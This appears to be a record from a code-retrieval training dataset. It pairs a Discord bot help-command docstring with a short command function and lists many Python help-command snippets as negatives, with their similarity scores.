\"vip-amsterdam\": \"__VIP__ Amsterdam \" + \"\\U0001F1F3\\U0001F1F1\",\n \"eu-west\": \"EU West \" + \"\\U0001F1EA\\U0001F1FA\",\n \"eu-central\": \"EU Central \" + \"\\U0001F1EA\\U0001F1FA\",\n \"europe\": \"Europe \" + \"\\U0001F1EA\\U0001F1FA\",\n \"london\": \"London \" + \"\\U0001F1EC\\U0001F1E7\",\n \"frankfurt\": \"Frankfurt \" + \"\\U0001F1E9\\U0001F1EA\",\n \"amsterdam\": \"Amsterdam \" + \"\\U0001F1F3\\U0001F1F1\",\n \"us-west\": \"US West \" + \"\\U0001F1FA\\U0001F1F8\",\n \"us-east\": \"US East \" + \"\\U0001F1FA\\U0001F1F8\",\n \"us-south\": \"US South \" + \"\\U0001F1FA\\U0001F1F8\",\n \"us-central\": \"US Central \" + \"\\U0001F1FA\\U0001F1F8\",\n \"singapore\": \"Singapore \" + \"\\U0001F1F8\\U0001F1EC\",\n \"sydney\": \"Sydney \" + \"\\U0001F1E6\\U0001F1FA\",\n \"brazil\": \"Brazil \" + \"\\U0001F1E7\\U0001F1F7\",\n \"hongkong\": \"Hong Kong \" + \"\\U0001F1ED\\U0001F1F0\",\n \"russia\": \"Russia \" + \"\\U0001F1F7\\U0001F1FA\",\n \"japan\": \"Japan \" + \"\\U0001F1EF\\U0001F1F5\",\n \"southafrica\": \"South Africa \" + \"\\U0001F1FF\\U0001F1E6\",\n \"india\": \"India \" + \"\\U0001F1EE\\U0001F1F3\",\n \"dubai\": \"Dubai \" + \"\\U0001F1E6\\U0001F1EA\",\n \"south-korea\": \"South Korea \" + \"\\U0001f1f0\\U0001f1f7\",\n }\n verif = {\n \"none\": \"0 - None\",\n \"low\": \"1 - Low\",\n \"medium\": \"2 - Medium\",\n \"high\": \"3 - High\",\n \"extreme\": \"4 - Extreme\",\n }\n features = {\n \"PARTNERED\": \"Partnered\",\n \"VERIFIED\": \"Verified\",\n \"DISCOVERABLE\": \"Server Discovery\",\n \"FEATURABLE\": \"Featurable\",\n \"PUBLIC\": \"Public\",\n \"PUBLIC_DISABLED\": \"Public disabled\",\n \"INVITE_SPLASH\": \"Splash Invite\",\n \"VIP_REGIONS\": \"VIP Voice Servers\",\n \"VANITY_URL\": \"Vanity URL\",\n \"MORE_EMOJI\": \"More Emojis\",\n \"COMMERCE\": \"Commerce\",\n \"NEWS\": \"News Channels\",\n \"ANIMATED_ICON\": \"Animated Icon\",\n \"BANNER\": \"Banner Image\",\n \"MEMBER_LIST_DISABLED\": \"Member list disabled\",\n }\n guild_features_list = [\n f\"✅ {name}\" for feature, name in features.items() if feature in guild.features\n ]\n joined_on = (\n \"{bot_name} joined this server on {bot_join}. That's {since_join} days ago!\"\n ).format(\n bot_name=ctx.bot.user.name,\n bot_join=guild.me.joined_at.strftime(\"%d %b %Y %H:%M:%S\"),\n since_join=(ctx.message.created_at - guild.me.joined_at).days,\n )\n data = discord.Embed(\n description=(f\"{guild.description}\\n\\n\" if guild.description else \"\") + created_at,\n colour=ctx.guild.me.top_role.color,\n )\n data.set_author(\n name=guild.name,\n icon_url=\"https://cdn.discordapp.com/emojis/457879292152381443.png\"\n if \"VERIFIED\" in guild.features\n else \"https://cdn.discordapp.com/emojis/508929941610430464.png\"\n if \"PARTNERED\" in guild.features\n else discord.Embed.Empty,\n )\n if guild.icon_url:\n data.set_thumbnail(url=guild.icon_url)\n data.add_field(name=\"Members:\", value=member_msg)\n data.add_field(\n name= \"Channels:\",\n value= (\n \"\\N{SPEECH BALLOON} Text: {text}\\n\"\n \"\\N{SPEAKER WITH THREE SOUND WAVES} Voice: {voice}\"\n ).format(text=bold(text_channels), voice=bold(voice_channels)),\n )\n data.add_field(\n name=\"Utility:\",\n value=(\n \"Owner: {owner}\\nVoice region: {region}\\nVerif. level: {verif}\\nServer ID: {id}{shard_info}\"\n ).format(\n owner=bold(str(guild.owner)),\n region=bold(f\"{vc_regions.get(str(guild.region)) or str(guild.region)}\"),\n verif=bold(verif[str(guild.verification_level)]),\n id=bold(str(guild.id)),\n shard_info=shard_info,\n ),\n inline=False,\n )\n data.add_field(\n name=\"Misc:\",\n value=(\n \"AFK channel: {afk_chan}\\nAFK timeout: {afk_timeout}\\nCustom emojis: {emoji_count}\\nRoles: {role_count}\"\n ).format(\n afk_chan=bold(str(guild.afk_channel))\n if guild.afk_channel\n else bold(\"Not Set\"),\n afk_timeout=bold(guild.afk_timeout),\n emoji_count=bold(len(guild.emojis)),\n role_count=bold(len(guild.roles)),\n ),\n inline=False,\n )\n if guild_features_list:\n data.add_field(name=\"Server features:\", value=\"\\n\".join(guild_features_list))\n if guild.premium_tier != 0:\n nitro_boost = (\n \"Tier {boostlevel} with {nitroboosters} boosters\\n\"\n \"File size limit: {filelimit}\\n\"\n \"Emoji limit: {emojis_limit}\\n\"\n \"VCs max bitrate: {bitrate}\"\n ).format(\n boostlevel=bold(str(guild.premium_tier)),\n nitroboosters=bold(guild.premium_subscription_count),\n filelimit=bold(_size(guild.filesize_limit)),\n emojis_limit=bold(str(guild.emoji_limit)),\n bitrate=bold(_bitsize(guild.bitrate_limit)),\n )\n data.add_field(name=\"Nitro Boost:\", value=nitro_boost)\n if guild.splash:\n data.set_image(url=guild.splash_url_as(format=\"png\"))\n data.set_footer(text=joined_on)\n\n await ctx.send(embed=data)", "def get_name(self):\n \n return 'TCP/IP Server'", "def get_ded_info(server, show=False):\n # start Requests session\n sc = requests.Session()\n\n # import cookies from Firefox\n sc.cookies.update(get_cookies('imhsc.imhadmin.net'))\n\n # send request\n vpx = sc.get('https://imhsc.imhadmin.net/index.php',\n params={'v': \"Dedicated\", 'selectServer': server})\n\n # check if login failed\n check_sc_login(vpx.text)\n\n # parse with BS4\n bs = BeautifulSoup(vpx.text, \"xml\")\n\n # server=0 ip=4 net=5 psc=6 user=11 type=14\n trr = bs.tbody.find_all('tr')\n if len(trr) > 0:\n tsrv = {\n 'hostname': trr[0].find_all('td')[0].string,\n 'ip': trr[0].find_all('td')[2].string,\n 'net': trr[0].find_all('td')[3].string,\n 'psc': trr[0].find_all('td')[4].a.string,\n 'user': trr[0].find_all('td')[9].string,\n 'type': trr[0].find_all('td')[12].string,\n 'status': trr[0].find_all('td')[13].string.strip()\n }\n else:\n tsrv = None\n\n if show:\n if tsrv:\n print(\"[%(hostname)s] IP: %(ip)s (%(net)s) / PSC: %(psc)s / User: %(user)s / Type: %(type)s / Status: %(status)s\" % tsrv)\n else:\n print(\"!! Server '%s' not found\" % (server))\n\n return tsrv" ]
[ "0.8096221", "0.80244446", "0.7995032", "0.7823503", "0.7384904", "0.7376968", "0.72559196", "0.7244653", "0.7027462", "0.70059526", "0.6965059", "0.69347584", "0.6865889", "0.68443227", "0.6838706", "0.6834391", "0.68235415", "0.68076944", "0.67965454", "0.67949927", "0.673637", "0.673637", "0.67306", "0.6726609", "0.66893345", "0.66709757", "0.66625744", "0.66491467", "0.66244173", "0.6607118", "0.6567703", "0.6567703", "0.65262425", "0.65192264", "0.65134716", "0.64855", "0.647899", "0.64526916", "0.6449917", "0.6441995", "0.64403266", "0.6437109", "0.64324033", "0.6389654", "0.637861", "0.6365638", "0.6355285", "0.6334399", "0.63249046", "0.6312996", "0.6306648", "0.6299358", "0.6296493", "0.62924063", "0.6290568", "0.6288605", "0.62871", "0.6286396", "0.6286396", "0.62767327", "0.6270174", "0.6269", "0.6265381", "0.6238064", "0.62374544", "0.623738", "0.6225643", "0.6223159", "0.6219124", "0.6208915", "0.6206577", "0.618729", "0.617808", "0.6175303", "0.61747926", "0.6173345", "0.6173345", "0.61700964", "0.6160715", "0.6151498", "0.6145647", "0.61405915", "0.6139291", "0.6138384", "0.61099184", "0.6103785", "0.60952926", "0.60909075", "0.6087721", "0.60845184", "0.60832405", "0.60619926", "0.606013", "0.6054223", "0.60485566", "0.60416615", "0.60416615", "0.6038813", "0.6022923", "0.60111845" ]
0.71475893
8
Type !help {command} for more info on a command. You can also type !help {category} for more info on a category. For example, !help level (If you have level plugin enable!)
async def command(self,ctx): await ctx.send("Yes this is a command.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def help_help(self):\n print(\"List commands or print details about a command\")", "def command_help(self, command):\n self.commands[command].command_help()", "def command_help(self, *args, **kwargs):\n print(\"Commands available:\\n\")\n for name in dir(self):\n if not name.startswith(\"command_\"):\n continue\n name_clean = name[len(\"command_\"):]\n print(\"%s:\\n - %s\\n\" % (name_clean, getattr(self, name).__doc__.strip()))", "def do_command_help(self, command):\n summary = self.base.commands[command].get_summary()\n usage = self.get_command_usage(command)\n description = self.base.commands[command].get_description()\n sys.stdout.write('%s\\n%s' % (summary, usage))\n if description != None:\n sys.stdout.write('Arguments Description:\\n%s\\n' %\n (description, ))", "def help(command=None):\n if command is None: \n # print first line of docstring\n for cmd in commands:\n ds = commands[cmd].__doc__.split('\\n')[0]\n print \"%-16s %s\" % (cmd,ds)\n else:\n print commands[command].__doc__", "def _help(self):\n self.onecmd('help')", "def cmd_help(args):", "def help():", "def help():\n \n pass", "async def _help(ctx, *, command_name: str=None):\n if command_name:\n command = bot.get_command(command_name)\n if not command:\n return await ctx.send(\"No such command!\")\n return await ctx.send(f\"```\\n{ctx.prefix}{command.name} {command.signature}\\n\\n{command.help or 'Missing description'}```\")\n description = []\n for name, cog in bot.cogs.items():\n entries = [\" - \".join([cmd.name, cmd.short_doc or \"Missing description\"]) for cmd in cog.get_commands() if await _can_run(cmd, ctx) and not cmd.hidden]\n if entries:\n description.append(f\"**{name}**:\")\n description.append(\"• \" + \"\\n• \".join(entries))\n await ctx.send(embed=discord.Embed(description=\"\\n\".join(description), color=ctx.me.color))", "def help_command(server, output, conf):\n server.tell(output.name, 'Available commands:')\n for key in COMMANDS.keys():\n cmd_func = COMMANDS[key]\n if cmd_func.__doc__:\n server.tell(output.name, '%s: %s' % (key[1:], cmd_func.__doc__))\n else:\n server.tell(output.name, key[1:])\n return", "def help():\n print(UI.HELP)", "def do_help(self, command_name):\n if not command_name:\n print _PVBlotInterp.__doc__\n print \"The following commands are supported:\"\n print \" \",\n blotish_commands = self._blotish_commands.keys()\n blotish_commands.sort()\n for c in blotish_commands:\n print c,\n print\n print\n print \"For more information on any command, try help <command>.\"\n return\n try:\n command = self.get_unique_command(command_name)\n print command.__doc__\n except blotish.BlotishError, err:\n blot_common.print_blot_error(err)", "def command_help(args):\n\tprint_usage()\n\treturn 0", "async def do_help(self, arg):\n if arg:\n if arg in self._commands:\n _, doc = self._commands[arg]\n print(doc)\n else:\n self.error('No command {}'.format(arg))\n else:\n print('Valid commands:')\n for c in self._commands:\n print(' ' + c)", "def show_help():\n pass", "def command_help(self):\n print(\"Command \", self)\n print(\"\\t\\thelp (Get help for command)\")\n\n params = self.params.copy()\n del params[\"help\"]\n\n if len(params) == 0:\n print(\"This command has no parameters\")\n return\n\n print(\"Parameters:\")\n for info in params.values():\n print(\" %s\" % info.get_basic_info())\n description = info.get_desc()\n if description != \"\":\n print(textwrap.fill(description,\n initial_indent=\" \",\n subsequent_indent=\" \",\n width=70))", "def help(self):\r\n self._short_help(None, None, None, None)", "def get_command_help(self, module_name, command_name):\r\n command = self.env.get_command(module_name, command_name)\r\n\r\n default_format = 'raw'\r\n if sys.stdout.isatty():\r\n default_format = 'table'\r\n\r\n arg_doc = command.__doc__\r\n\r\n if 'confirm' in command.options:\r\n arg_doc += \"\"\"\r\nPrompt Options:\r\n -y, --really Confirm all prompt actions\r\n\"\"\"\r\n\r\n if '[options]' in arg_doc:\r\n arg_doc += \"\"\"\r\nStandard Options:\r\n --format=ARG Output format. [Options: table, raw] [Default: %s]\r\n -C FILE --config=FILE Config file location. [Default: ~/.softlayer]\r\n --debug=LEVEL Specifies the debug noise level\r\n 1=warn, 2=info, 3=debug\r\n --timings Time each API call and display after results\r\n --proxy=PROTO:PROXY_URL HTTP[s] proxy to be use to make API calls\r\n -h --help Show this screen\r\n\"\"\" % default_format\r\n return arg_doc.strip()", "def help(self):", "def help(self):", "def help(self):\n pass", "def help(self):\n pass", "def help(self, args):\n print('No commands available for this consumer')", "def help():\n print \"Help comes to those who ask\"", "def cmd_help(ctx):\n echo(ctx.parent.get_help())", "async def help(self, ctx, *, command_name: str=None):\n bot_prefix = '@Randy '\n # Shortcut to command search\n if command_name is not None:\n return await ctx.invoke(self.cmd('help command'), cmd_name=command_name)\n\n em = discord.Embed(title='Help',\n description='**Permissions:** The permissions required to function :-\\n'\n '`Send Messages`, `Manage Messages`, `Embed Links`\\n'\n '--\\nTo get help or more information on a specific command, use:\\n'\n '`{bot_prefix}help <command name>`\\n'\n '--\\nRead my messy code [here](http://github.com/xKynn/RandomRumble)'\n '--\\nIf you like my work and would like to help me, '\n 'Ko-Fi/Paypal: [Link](https://ko-fi.com/D1D6EXXV)\\n',\n color=self.color)\n\n em.set_footer(text=\"Contact me at Demo#7645\")\n\n # This can't go in the init because help isn't loaded last & thus misses some commands\n em.add_field(name=\"Commands\", value=' • '+'\\n • '.join(f\"***{c.name}*** - {c.short_doc}\" for c in self.bot.commands if\n c.name not in ['pob', 'link', 'convert']))\n try:\n await ctx.send(embed=em)\n except:\n await ctx.send(\"`Embed Links` permission is required to see the help!\")", "def command_short():\n pass", "def help_util():\r\n for cmd, f in COMMANDS.items():\r\n print(\"POM \" + cmd + \":\")\r\n print(f.__doc__.lstrip(\"\\n\"))", "def test_cli_help(self):\n output = self.update_command('-h')", "async def send_command_help(self, command):\n ctx = self.context\n embed = discord.Embed(title=command.name.upper(), description=command.description, color=discord.Color.green())\n alias = command.aliases\n if alias:\n embed.add_field(name=\"Aliases\", value=\", \".join(alias), inline=False)\n if command.usage != None:\n embed.add_field(name=\"How to use:\", value=f'`{command.usage}`')\n\n await ctx.reply(embed=embed)", "def command_help(self, bot, update):\n\n messages = [\n 'Available commands:',\n '/who - Who is Myles?',\n '/where - Where is Myles?',\n '/tweet - What was the last tweet Myles sent?',\n '/photo - What was the last Instagram photo Myles took?',\n '/web - Where can I find Myles on the interwebs?',\n ]\n\n self.send_messages(bot, update, messages)", "def printhelp():", "def print_help(self):\n\n print((\"Help is not defined for command \" + self.command))", "async def help(self, *args, **kwargs):\n if len(args) == 0:\n return self.help.__doc__\n docs = []\n for command in args:\n if command in self.user_special_bang_set:\n docs.append(self.user_special_bang_set[command].bang_skill.__doc__)\n elif command in self.control_bang_set:\n docs.append(self.control_bang_set[command].bang_skill.__doc__)\n\n return \"| \".join(docs)", "def CommandHelp(paser):\n\n\tprint \"\\n===============Commands List===============\\n\"\n\t\t\n\tprint \"NewProject - {}\".format(NewProject.__doc__)\n\tprint \"DelProject - {}\".format(DelProject.__doc__)\n\tprint \"ShareProject - {}\".format(ShareProject.__doc__)\n\tprint \"StopProject - {}\".format(StopProject.__doc__)\n\tprint \"Help - {}\".format(CommandHelp.__doc__)\n\tprint \"Exit - Finaliza la sesion en la terminal.\"", "def _help():\n text = \"\"\"\n```\nUsage: @bot [command] (message)\n\n*Commands*:\n \n add Adds specified users to notify list | To add yourself use key 'myself'\n list Lists users on notify list\n remove Removes specified users from notify list | To remove yourself use key 'myself'\n help This help\n\n > Obs: All commands are optional\n\n*Examples*:\n\n @bot add myself @Fulano <= Will add yourself and @Fulano in list.\n @bot this a messge test <= Send 'this a messge test' to all list.\n @bot remove myself @Fulano <= Remove yourself and @fulano from list.\n\n```\n\"\"\"\n return text", "def help(cmd, cmdArgs):\n global commandDict\n retInfo = []\n if len(cmdArgs) > 0:\n #return help on a single function\n if cmdArgs[0] in commandDict.keys():\n return commandDict[cmdArgs[0]].__doc__\n\n #else, return general info\n retInfo = ['pypeople: A command line tool for vCard management',\n 'Version:' + __version__,\n 'Available Commands:']\n #fill in more info here\n for cmdName in commandDict.keys():\n cmdFunc = commandDict[cmdName]\n cmdDoc = str(cmdName) + ': ' + str(cmdFunc.__doc__) if cmdFunc.__doc__ is not None else 'Undocumented Function'\n retInfo.append('\\t' + cmdDoc)\n\n return '\\n'.join(retInfo)", "def print_generic_help():\r\n print ART_NAME\r\n print 'Version {1}\\nby {2}'.format(NAME, VERSION, AUTHOR)\r\n print DESCRIPTION\r\n tools = sorted(AvailableCommands.commands.keys(), key=lambda v: v.upper())\r\n # Do not show CUSTOM command in the help\r\n tools.remove('CUSTOM')\r\n tools.remove('CUSTOM_NO_OUTPUT')\r\n print '\\n\\nSupported tools are:\\n{0}'.format('\\n'.join(tools))\r\n print '\\nHint: Check tool specific help with --help <tool_name>\\n'", "async def help(ctx, command:str=None):\n if command == None:\n embed = assemble_embed(\n title=\"Looking for help?\",\n desc=(\"Hey there, I'm a resident bot of Scioly.org!\\n\\n\" +\n \"On Discord, you can send me commands using `!` before the command name, and I will process it to help you! \" +\n \"For example, `!states`, `!events`, and `!fish` are all valid commands that can be used!\\n\\n\" +\n \"If you want to see some commands that you can use on me, just type `!list`! \" +\n \"If you need more help, please feel free to reach out to a staff member!\")\n )\n return await ctx.send(embed=embed)\n hlp = await get_help(ctx, command)\n await ctx.send(embed=hlp)", "def help(self, msg=None):\n\n # Print the message if given.\n if not msg == None:\n print str(msg) + \"\\n\"\n\n # Display the list of commands, in the alphabetical order.\n print \"Use one of the following commands:\"\n for action in sorted(self.actions.keys()):\n info = self.actions[action]\n joined_oblig = ' '.join(info['required'])\n if len(info['additional']) > 0:\n add = [\"<%s>\" % x for x in info['additional']]\n joined_add = '[' + ' '.join(add) + ']'\n else:\n joined_add = ''\n print \"\\t* %s %s %s\" % (action, joined_oblig, joined_add)", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text(\"These are the list of commands supported. \\n\\n /deadlines. \\n\\n \"\n \"Hey! I am still being enhanced, more features to come...!\")", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Laughybot\\n\\n VERSION\\n 0.1 \\n\\nUSAGE\\n /{command} : Entrer une commande parmi celles disponibles\\n\\nCOMMADES\\n/joke => recherche une blague sur la toile\\n/start => Affiche le message d'accueil\\n/help => Affiche l'aide\")", "def get_help(self,command):\n if \"help\" in self.commands[command]:\n return self.commands[command][\"help\"]\n else:\n return \"No help defined for this command.\"", "def do_help(self, args): \n if args.command:\n if len(args.command) > 1:\n command = args.command[0] +\"-\" + args.command[1]\n else:\n command = args.command[0]\n if command in self.subcommands:\n self.subcommands[command].print_help()\n else:\n print((\"'%s' is not a valid subcommand\") %\n args.command)\n else:\n self.parser.print_help()", "def help_command(update, context):\n update.message.reply_text('Help!')", "def get_help(self) -> None: \n print(messages.get_help())", "async def help(self, ctx):\n self.log_command_call(\"help\", ctx.message)\n await ctx.send(HELP_TEXT)\n embed_output = create_embed(description=MORE_INFO_TEXT)\n await ctx.send(embed=embed_output)", "def dispatch_help(args):\n command = args.subcommand\n if command is None:\n command = 'help'\n args.parsers[command].print_help()\n\n cmd_func = getattr(EtcMaint, 'cmd_%s' % command, None)\n if cmd_func:\n lines = cmd_func.__doc__.splitlines()\n print('\\n%s\\n' % lines[0])\n paragraph = []\n for l in dedent('\\n'.join(lines[2:])).splitlines():\n if l == '':\n if paragraph:\n print('\\n'.join(wrap(' '.join(paragraph), width=78)))\n print()\n paragraph = []\n continue\n paragraph.append(l)\n if paragraph:\n print('\\n'.join(wrap(' '.join(paragraph), width=78)))", "def print_specific_help(tool_name):\r\n if tool_name not in AvailableCommands.commands:\r\n print 'Command is not supported: {0}'.format(tool_name)\r\n return\r\n cmd = AvailableCommands.commands[tool_name]\r\n\r\n print 'Usage of {0}:'.format(cmd.name)\r\n print '\\nAccepted input types:\\n{0}'.format(str(list(cmd.input_types)))\r\n print '\\nOutput types:\\n{0}'.format(str(cmd.output_types))\r\n print '\\nMandatory arguments:\\n{0}'.format(str(cmd.user_mandatory_args))\r\n print '\\nOptional arguments:\\n{0}'.format(str(cmd.user_optional_args))\r\n print '\\nParallelizable:\\n{0}'.format(str(cmd.parallelizable))\r\n print '\\nAdditional description:\\n{0}'.format(str(cmd.help_description))\r\n print ''", "def display_help(self):\n pass", "async def help_command(self, ctx, *, cmd_name: str=None):\n bot_prefix = '@Randy '\n # Get command object\n cmd_obj = self.cmd(cmd_name)\n\n # Handle no command found\n if cmd_obj is None:\n return await ctx.error(f'Command {cmd_name} not found')\n em = discord.Embed(title=cmd_obj.name, description=cmd_obj.help, color=self.color)\n\n # Input aliases and parameters to embed\n if cmd_obj.aliases:\n em.add_field(name='Aliases', value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.aliases]))\n if cmd_obj.clean_params:\n em.add_field(name='Parameters', value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.clean_params]))\n\n # Handle group commands\n if isinstance(cmd_obj, commands.core.Group):\n em.add_field(name='Group commands',\n value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.commands]),\n inline=False)\n\n # Add usage last\n em.add_field(name='Usage',\n value=f'```{bot_prefix}\\u200b{cmd_name} '\n f'{\" \".join([f\"<{x}>\" for x in cmd_obj.clean_params])}```',\n inline=False)\n\n await ctx.send(embed=em)", "def showHelp(self):\n\t\tfor i in range(0,20):\n\t\t\tprint \"\"\n\t\tprint \" _ _ \"\n\t\tprint \"| | | | \"\n\t\tprint \"| |__ _ __ ___ | |__ \"\n\t\tprint \"| '_ \\ | '_ \\ / __|| '_ \\ \"\n\t\tprint \"| | | || | | |\\__ \\| | | |\"\n\t\tprint \"|_| |_||_| |_||___/|_| |_|\"\n\t\tprint \"A program by Scott Jackson\"\n\t\tprint \"\"\n\t\tprint \"To enter a command, type the key and press Return.\"\n\t\tprint \"NB: parentheses indicate which of two options is the default.\"\n\t\tprint \"\"\n\t\tprint \"Basic Commands:\"\n\t\tprint \"j / k -- show lower-ranked / higher-ranked stories.\"\n\t\tprint \"r -- get the latest stories from Hacker News.\"\n\t\tprint \"q -- quit.\"\n\t\tprint \"# -- open story number # in your web browser.\"\n\t\tprint \"c# -- open comments for story number # in your web browser.\"\n\t\tprint \"#+ -- open up story number # AND its comments in your web browser.\"\n\t\tprint \"top / new -- switch between showing the top and newest stories on HN. (top)\"\n\t\tprint \"c / e -- collapse stories you've already read / don't collapse them. (e)\"\n\t\tprint \"u -- update hnsh to the latest version.\"\n\t\tprint \"==========================\"\n\t\tprint \"For more commands, see the man.txt file.\"\n\t\tinput = raw_input(\"Press Return to go back to the Hacker News stories.\")", "def help(self, irc, msg, args, command):\n command = map(callbacks.canonicalName, command)\n (maxL, cbs) = irc.findCallbacksForArgs(command)\n if maxL == command:\n if len(cbs) > 1:\n names = sorted([cb.name() for cb in cbs])\n irc.error(format('That command exists in the %L plugins. '\n 'Please specify exactly which plugin command '\n 'you want help with.', names))\n else:\n assert cbs, 'Odd, maxL == command, but no cbs.'\n irc.reply(cbs[0].getCommandHelp(command, False))\n else:\n irc.error(format('There is no command %q.',\n callbacks.formatCommand(command)))", "def help(self):\n\t\treturn", "def help(ctx):\n click.echo(ctx.parent.get_help())", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "async def do_help():\n\n if len(message.content.split()) > 1:\n for i in cmd_dict:\n if message.content.split()[1] == i:\n await bot.send_message(c, f'Help for {i}: {cmd_dict[i].__doc__}')\n return\n\n cmdstr = 'Commands: '\n for i in cmd_dict:\n cmdstr += '{}, '.format(i)\n await bot.send_message(c, cmdstr)", "def help(self, cmd=\"\", *, fail=\"\"):\n class_dict = dict(type(self).__dict__)\n # Add this function to class, so that when subclassing,\n # help for help is found\n class_dict.update({\"help\": self.help})\n if cmd.startswith(self.predicate):\n # Strip predicate\n cmd = cmd[len(self.predicate) :]\n # Check that command exists and is not\n # private, protected or special method\n if (not cmd.startswith(\"_\")) and cmd in class_dict.keys():\n item = class_dict[cmd]\n if callable(item):\n if item.__doc__:\n return \"Help on command '{}':\\n. {}\".format(\n cmd, \"\\n. \".join(cleandoc(item.__doc__).split(\"\\n\"))\n )\n return \"No help on command '{}'\".format(cmd)\n # If no cmd given or wrong cmd given, return commands\n commands = []\n for key, value in class_dict.items():\n if not key.startswith(\"_\"):\n if callable(value):\n commands.append(key)\n msg = (\n \"Commands:\\n {}\".format(\", \".join(commands))\n + \"\\n for more help on command, use \"\n + \"{}help command\".format(self.predicate)\n )\n if fail:\n msg = fail + \"\\n\" + msg\n return msg", "def help():\n version()\n print(\"USAGE: python3 notes.py [COMMAND]\")\n print(\"COMMAND:\")\n help_dict = {\n \"help\": \"Prints out the help text.\",\n \"version\": \"Prints out the version.\",\n \"init\": \"Initializes a new set of notes.\",\n \"modify\": \"Modify the current set of notes.\",\n }\n help_dict = OrderedDict(sorted(help_dict.items()))\n for entry in help_dict:\n print((\" \" + entry).ljust(10), help_dict[entry])", "def do_help(self, message):\r\n\t\tcommands = [command[3:] for command in dir(self) if command.startswith('do_')]\r\n\t\t# self.trace(f'Help: {\", \".join(commands)}')\r\n\r\n\t\tfor command in commands:\r\n\t\t\tmethod = getattr(self, f'do_{command}')\r\n\t\t\tcommand_help = getattr(method, '__doc__')\r\n\t\t\tif command_help:\r\n\t\t\t\tself.trace(f'{command}: {command_help}')", "def help_command(update: Update, context: CallbackContext) -> None:\n commands = [\"/login <pwd>\\n\",\n \"/status\\n\",\n \"/heat\\n\",\n \"/temp\\n\",\n \"/off\\n\",\n \"/help\\n\",\n \"/set\\n\",\n \"/unset\\n\",\n \"/heatmore\\n\",\n \"/lighton\\n\",\n \"/lightoff\\n\"]\n\n cmd: str = \" \".join(commands)\n update.message.reply_text('commands are:\\n' + cmd)", "def Help(topic=None):\n\n if not topic:\n print \"Avaliable commands are: \"\n print \"\\n\".join(map(lambda x:\" \"*3+x, filter(lambda c:c!=\"help\", commands)))\n print \"Type help command to get help with a specific command.\"\n\n elif topic in commands:\n print \"Help for %s:\"%topic\n print commands[topic].__doc__", "def do_help(self, arg):\n if arg:\n # Getting help for a specific command\n funcname = self._func_named(arg)\n if funcname:\n # No special behavior needed, delegate to cmd base class do_help()\n cmd.Cmd.do_help(self, funcname[3:])\n else:\n # Show a menu of what commands help can be gotten for\n self._help_menu()", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def show_help(message, commands):\n commands_help = [\n {\n 'name': 'help',\n 'text': 'show this help message.'\n },\n ]\n\n commands_help.extend((c.help for key, c in commands.items()))\n command_text = '\\n'.join([' {0[name]:<12}{0[text]}'.format(cmd)\n for cmd in commands_help])\n help_message = '**redditfy-bot** available commands:\\n{}'.format(command_text)\n print(help_message)\n return help_message", "def help_command(update: Update) -> None:\n #update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\r\n update.message.reply_text('Help!')", "async def help(self, args):\n if not args:\n maxw = max([len(x) for x in self.commands]) + 1\n commands = list(self.commands)\n commands.sort()\n message = '\\n'.join(['`{name:{width}}|` {desc}'.format(\n name=command, width=maxw,\n desc=(self.commands[command].__doc__ or 'No description.').splitlines()[0]\n ) for command in commands])\n await self.send(\"Unlisted commands are forwarded to the Minecraft server.\\n\" + message)\n elif args.lower() not in self.commands:\n await self.send_error(\"Unknown command: {command}. This might be a Minecraft command.\".format(command=args))\n else:\n args = args.lower()\n await self.send(\"**`{name}`** - {doc}\".format(name=args, doc=self.commands[args].__doc__ or 'No description.'))", "def help(self):\n help = ''\n cmds = [(x, y) for x, y in Commands.__dict__.iteritems()]\n cmds.sort(key=lambda x: x[0])\n for name, member in cmds:\n if name.startswith('cmd_') and callable(member):\n help += ' %s\\n' % ' '.join([name[4:]] +\n ['<%s>' % x for x in\n inspect.getargspec(member).args[1:]])\n if member.__doc__:\n help += ' %s\\n' % member.__doc__.splitlines()[0]\n return 'Available commands:\\n%s' % help", "def help_command(update, context):\n update.message.reply_text('Let me help you. \\r\\n /help print this help \\r\\n /safety prints safety instructions \\r\\n /play start the game\\r\\n /joingroup Join CTF tg group')", "def help(ctx, topic, **kw):\n # The help command implementation is taken from\n # https://www.burgundywall.com/post/having-click-help-subcommand\n if topic is None:\n click.echo(ctx.parent.get_help())\n else:\n click.echo(main.commands[topic].get_help(ctx))", "async def getHelp(ctx, cmd):\n wikiMods = discord.utils.get(ctx.message.author.guild.roles, name=\"Wiki Moderator\")\n cmdInfo = next((c for c in COMMAND_INFO if c[\"name\"] == cmd or cmd in c[\"aliases\"]), None)\n if cmdInfo == None:\n return assembleEmbed(\n title=f\"`{cmd}`\",\n desc=\"Cannot find command with this name. Try again buddy.\",\n webcolor=\"red\"\n )\n else:\n roles = [(discord.utils.get(ctx.message.author.guild.roles, name=r)) for r in cmdInfo['access']]\n commandFields = [\n {\n \"name\": \"Parameters\",\n \"value\": \"\\n\".join([f\"`{p['name']}` - {p['description']}\" for p in cmdInfo['parameters']]) if len(cmdInfo['parameters']) > 0 else \"`none`\",\n \"inline\": False\n }\n ]\n # If command has flags show those, if not do nothing\n if 'flags' in cmdInfo:\n commandFields.append({\n \"name\": \"Flags\",\n \"value\": \"\\n\".join([f\"`-{u['name']}` - {u['description']}\" for u in cmdInfo['flags']]),\n \"inline\": False\n })\n # Add available roles\n commandFields.extend([\n {\n \"name\": \"Usage\",\n \"value\": \"\\n\".join([f\"`{u['cmd']}` - {u['result']}\" for u in cmdInfo['usage']]),\n \"inline\": False\n },\n {\n \"name\": \"Available To\",\n \"value\": \"\\n\".join([f\"{r.mention}\" for r in roles]),\n \"inline\": False\n }\n ]\n )\n return assembleEmbed(\n title=f\"`!{cmdInfo['name']}`\",\n 